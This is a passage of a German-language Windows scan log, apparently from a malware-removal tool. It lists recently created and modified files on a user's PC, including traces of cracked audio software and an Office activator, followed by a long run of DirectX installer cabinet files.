2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak
2015-09-19 12:12 - 2015-09-20 01:26 - 00000000 ____D C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---
2015-09-19 12:06 - 2015-09-19 12:12 - 00000000 ____D C:\ProgramData\Microsoft Toolkit
2015-09-19 11:42 - 2015-09-19 15:43 - 00000000 ____D C:\Users\Kenny G\Desktop\Neuer Ordner (3)
2015-09-19 11:35 - 2015-09-19 11:38 - 55791130 _____ C:\Users\Kenny G\Downloads\MS-PowerPoint-2013-ISO-and-Activator.zip
2015-09-19 11:07 - 2015-09-19 11:07 - 00000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
2015-09-19 11:06 - 2015-09-19 16:06 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-09-19 11:06 - 2015-09-19 11:06 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Microsoft Help
2015-09-13 21:57 - 2015-09-13 22:26 - 00000000 ____D C:\Users\Kenny G\Desktop\USB Lieder
2015-09-13 12:25 - 2015-09-13 12:30 - 327964808 _____ (Microsoft Corporation) C:\Users\Kenny G\Downloads\X16-32694.exe
2015-09-01 22:40 - 2015-09-01 22:40 - 00001666 _____ C:\Users\Kenny G\Desktop\Traktor.exe - Verknüpfung.lnk
2015-09-01 21:50 - 2015-09-01 21:58 - 241712938 _____ C:\Users\Kenny G\Downloads\Traktor_2_290_PC.zip
2015-09-01 21:43 - 2015-09-01 21:43 - 01260832 _____ C:\Users\Kenny G\Downloads\Traktor Pro 2 - CHIP-Installer.exe
2015-09-01 20:31 - 2015-09-01 20:31 - 00000000 ____D C:\Backup
2015-09-01 20:20 - 2015-08-07 22:21 - 00000000 ____D C:\Users\Kenny G\Desktop\Native.Instruments.TRAKTOR.2.v2.9.0.x86.x64-CHAOS
2015-08-31 23:34 - 2015-09-01 20:19 - 527315694 _____ C:\Users\Kenny G\Downloads\2.9.0.x86.x64-CHAOS.rar
2015-08-29 20:49 - 2015-08-29 20:49 - 00000000 _____ C:\Windows\setuperr.log
2015-08-29 20:33 - 2015-08-29 20:34 - 00000000 ____D C:\ProgramData\Package Cache
2015-08-29 19:48 - 2015-09-19 11:54 - 00000000 ____D C:\Users\Kenny G\Desktop\Alles
2015-08-29 16:06 - 2015-08-30 01:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-08-29 15:56 - 2015-09-01 22:33 - 00143270 _____ C:\Windows\DPINST.LOG

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-09-20 19:30 - 2013-10-01 21:23 - 01080796 _____ C:\Windows\WindowsUpdate.log
2015-09-20 19:24 - 2015-05-19 19:27 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job
2015-09-20 19:16 - 2015-06-01 12:52 - 00000000 ____D C:\ProgramData\MFAData
2015-09-20 19:14 - 2013-10-01 21:24 - 00000000 ____D C:\Users\Kenny G
2015-09-20 18:28 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-09-20 18:28 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-09-20 18:24 - 2015-05-19 19:27 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job
2015-09-20 18:23 - 2015-08-07 13:40 - 00025668 _____ C:\Windows\PFRO.log
2015-09-20 18:23 - 2015-07-28 07:45 - 00018460 _____ C:\Windows\setupact.log
2015-09-20 18:23 - 2013-11-03 19:09 - 00000000 ____D C:\ProgramData\NVIDIA
2015-09-20 18:23 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-09-20 18:21 - 2015-06-01 11:16 - 00000000 ____D C:\AdwCleaner
2015-09-20 18:07 - 2015-08-07 11:34 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Lavasoft
2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\ProgramData\Lavasoft
2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2015-09-20 03:16 - 2013-10-02 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\vlc
2015-09-19 18:33 - 2013-10-03 21:25 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Skype
2015-09-19 17:16 - 2015-07-27 22:57 - 00068936 _____ C:\Users\Kenny G\AppData\Local\GDIPFONTCACHEV1.DAT
2015-09-19 16:39 - 2015-07-28 07:44 - 00317968 _____ C:\Windows\system32\FNTCACHE.DAT
2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-09-19 16:35 - 2015-05-12 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-09-19 16:07 - 2015-08-07 11:38 - 00003848 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1438940281
2015-09-19 16:07 - 2015-08-07 11:37 - 00000000 ____D C:\Program Files (x86)\Opera
2015-09-19 16:06 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2015-09-19 15:37 - 2015-06-02 08:55 - 00000000 ____D C:\ProgramData\AVG2015
2015-09-19 15:37 - 2013-10-01 21:25 - 00001442 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2015-09-19 11:54 - 2014-11-11 21:45 - 00000000 ____D C:\Users\Kenny G\Desktop\schule
2015-09-19 11:17 - 2009-07-14 20:18 - 00000000 ____D C:\Windows\ShellNew
2015-09-16 20:19 - 2015-05-19 19:27 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70
2015-09-16 20:19 - 2015-05-19 19:27 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720
2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2015-09-12 12:14 - 2014-01-15 20:58 - 00215128 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2015-09-12 12:14 - 2013-12-08 04:01 - 00000000 ____D C:\Program Files (x86)\Steam
2015-09-09 10:54 - 2014-02-17 11:46 - 00000000 ____D C:\Users\Tabea Studium
2015-09-09 10:54 - 2013-12-14 00:05 - 00000000 ____D C:\Users\eLoot
2015-09-03 13:45 - 2013-10-26 19:41 - 00305664 ___SH C:\Users\Kenny G\Documents\Thumbs.db
2015-09-03 13:43 - 2015-08-13 02:23 - 00000946 _____ C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job
2015-09-03 13:43 - 2015-02-10 17:45 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job
2015-09-03 13:43 - 2015-02-10 17:45 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job
2015-09-03 13:43 - 2014-11-14 16:21 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job
2015-09-03 13:43 - 2014-02-16 13:52 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-09-03 13:43 - 2014-02-16 13:52 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-09-02 22:17 - 2015-06-01 12:10 - 00003206 _____ C:\Windows\System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441}
2015-09-02 22:17 - 2015-02-10 17:45 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80
2015-09-02 22:16 - 2015-08-13 02:23 - 00003948 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2015-09-02 22:16 - 2015-02-10 17:45 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0
2015-09-02 22:16 - 2014-11-14 16:21 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90
2015-09-02 22:16 - 2014-02-16 13:52 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-09-02 22:16 - 2014-02-16 13:52 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-09-02 22:16 - 2014-02-16 03:10 - 00003300 _____ C:\Windows\System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679}
2015-09-02 22:16 - 2013-10-01 22:01 - 00002778 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2015-09-01 22:34 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2015-09-01 22:33 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Native Instruments
2015-09-01 22:24 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Common Files\Native Instruments
2015-09-01 22:17 - 2015-08-08 00:13 - 00000000 ____D C:\Users\Kenny G\Documents\Native Instruments
2015-08-30 01:38 - 2013-12-04 21:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-08-29 20:01 - 2014-06-19 18:04 - 00000000 ____D C:\Users\Kenny G\.thumbnails
2015-08-29 20:01 - 2009-10-14 08:04 - 00000000 ____D C:\Windows\Panther
2015-08-29 19:56 - 2015-07-20 21:25 - 00000995 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Tor Browser.lnk
2015-08-29 15:58 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Native Instruments
2015-08-29 09:26 - 2015-06-02 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2015-08-29 03:35 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2015-08-26 18:37 - 2009-10-14 07:12 - 134753440 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-08-26 11:33 - 2015-06-02 09:01 - 00000000 ____D C:\Program Files (x86)\AVG Web TuneUp

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2010-06-02 06:21 - 2010-06-02 06:21 - 1347354 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1078962 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1397830 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1115221 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0916430 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 4162630 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86_Archive.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0179133 _____ () C:\Program Files (x86)\Apr2006_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0133103 _____ () C:\Program Files (x86)\Apr2006_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0087101 _____ () C:\Program Files (x86)\Apr2006_xinput_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0046010 _____ () C:\Program Files (x86)\Apr2006_xinput_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0698612 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0695865 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1607358 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1606039 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0195766 _____ () C:\Program Files (x86)\APR2007_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0151225 _____ () C:\Program Files (x86)\APR2007_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0096817 _____ () C:\Program Files (x86)\APR2007_xinput_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0053302 _____ () C:\Program Files (x86)\APR2007_xinput_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1350542 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1077644 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0182903 _____ () C:\Program Files (x86)\AUG2006_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0137235 _____ () C:\Program Files (x86)\AUG2006_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0087142 _____ () C:\Program Files (x86)\AUG2006_xinput_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0046058 _____ () C:\Program Files (x86)\AUG2006_xinput_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0852286 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0796867 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1800160 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1708152 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0198096 _____ () C:\Program Files (x86)\AUG2007_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0153012 _____ () C:\Program Files (x86)\AUG2007_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0867612 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0849167 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1794084 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1464672 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0121772 _____ () C:\Program Files (x86)\Aug2008_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0092996 _____ () C:\Program Files (x86)\Aug2008_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0271412 _____ () C:\Program Files (x86)\Aug2008_XAudio_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0271038 _____ () C:\Program Files (x86)\Aug2008_XAudio_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0919044 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0900598 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 3112111 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 3319740 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0232635 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0192131 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0136301 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0105044 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0930116 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0728456 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0122408 _____ () C:\Program Files (x86)\Aug2009_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093106 _____ () C:\Program Files (x86)\Aug2009_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0273264 _____ () C:\Program Files (x86)\Aug2009_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0272642 _____ () C:\Program Files (x86)\Aug2009_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1357976 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1079456 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0212807 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0191720 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1571154 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1574376 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0192475 _____ () C:\Program Files (x86)\DEC2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0145599 _____ () C:\Program Files (x86)\DEC2006_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0089944 _____ (Microsoft Corporation) C:\Program Files (x86)\DSETUP.dll
2010-06-02 06:22 - 2010-06-02 06:22 - 1801048 _____ () C:\Program Files (x86)\dsetup32.dll
2010-06-02 06:22 - 2010-06-02 06:22 - 0042410 _____ () C:\Program Files (x86)\dxdllreg_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0537432 _____ () C:\Program Files (x86)\DXSETUP.exe
2010-06-02 06:22 - 2010-06-02 06:22 - 0094011 _____ () C:\Program Files (x86)\dxupdate.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1247499 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1013225 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1362796 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1084720 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0178359 _____ () C:\Program Files (x86)\Feb2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0132409 _____ () C:\Program Files (x86)\Feb2006_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0194675 _____ () C:\Program Files (x86)\FEB2007_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0147983 _____ () C:\Program Files (x86)\FEB2007_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0054678 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0020713 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0122446 _____ () C:\Program Files (x86)\Feb2010_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093180 _____ () C:\Program Files (x86)\Feb2010_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0276960 _____ () C:\Program Files (x86)\Feb2010_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0277191 _____ () C:\Program Files (x86)\Feb2010_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1336002 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1064925 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0180785 _____ () C:\Program Files (x86)\JUN2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0133671 _____ () C:\Program Files (x86)\JUN2006_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0699044 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0698472 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1607774 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1607286 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0197122 _____ () C:\Program Files (x86)\JUN2007_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0152909 _____ () C:\Program Files (x86)\JUN2007_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0867828 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0849919 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1792608 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1463878 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0055154 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021905 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0121054 _____ () C:\Program Files (x86)\JUN2008_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093128 _____ () C:\Program Files (x86)\JUN2008_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0269628 _____ () C:\Program Files (x86)\JUN2008_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0269024 _____ () C:\Program Files (x86)\JUN2008_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0944460 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0931471 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0752783 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0762188 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0235955 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0197283 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0138205 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0109445 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0937246 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0768036 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0124596 _____ () C:\Program Files (x86)\Jun2010_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093686 _____ () C:\Program Files (x86)\Jun2010_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0277338 _____ () C:\Program Files (x86)\Jun2010_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0278060 _____ () C:\Program Files (x86)\Jun2010_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0844884 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0818260 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1769862 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1443282 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0055058 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021867 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0122336 _____ () C:\Program Files (x86)\Mar2008_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093734 _____ () C:\Program Files (x86)\Mar2008_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0251194 _____ () C:\Program Files (x86)\Mar2008_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0226250 _____ () C:\Program Files (x86)\Mar2008_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1067160 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1040745 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1973702 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1612446 _____ () C:\Program Files (x86)\Mar2009_d3dx9_41_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0054600 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021298 _____ () C:\Program Files (x86)\Mar2009_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0121506 _____ () C:\Program Files (x86)\Mar2009_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0092740 _____ () C:\Program Files (x86)\Mar2009_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0275044 _____ () C:\Program Files (x86)\Mar2009_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0273018 _____ () C:\Program Files (x86)\Mar2009_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0864600 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0803884 _____ () C:\Program Files (x86)\Nov2007_d3dx10_36_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1802058 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1709360 _____ () C:\Program Files (x86)\Nov2007_d3dx9_36_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0046144 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0018496 _____ () C:\Program Files (x86)\NOV2007_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0196762 _____ () C:\Program Files (x86)\NOV2007_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0148264 _____ () C:\Program Files (x86)\NOV2007_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0994154 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0965421 _____ () C:\Program Files (x86)\Nov2008_d3dx10_40_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1906878 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1550796 _____ () C:\Program Files (x86)\Nov2008_d3dx9_40_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0054522 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021851 _____ () C:\Program Files (x86)\Nov2008_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0121794 _____ () C:\Program Files (x86)\Nov2008_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0092684 _____ () C:\Program Files (x86)\Nov2008_XACT_x86.cab
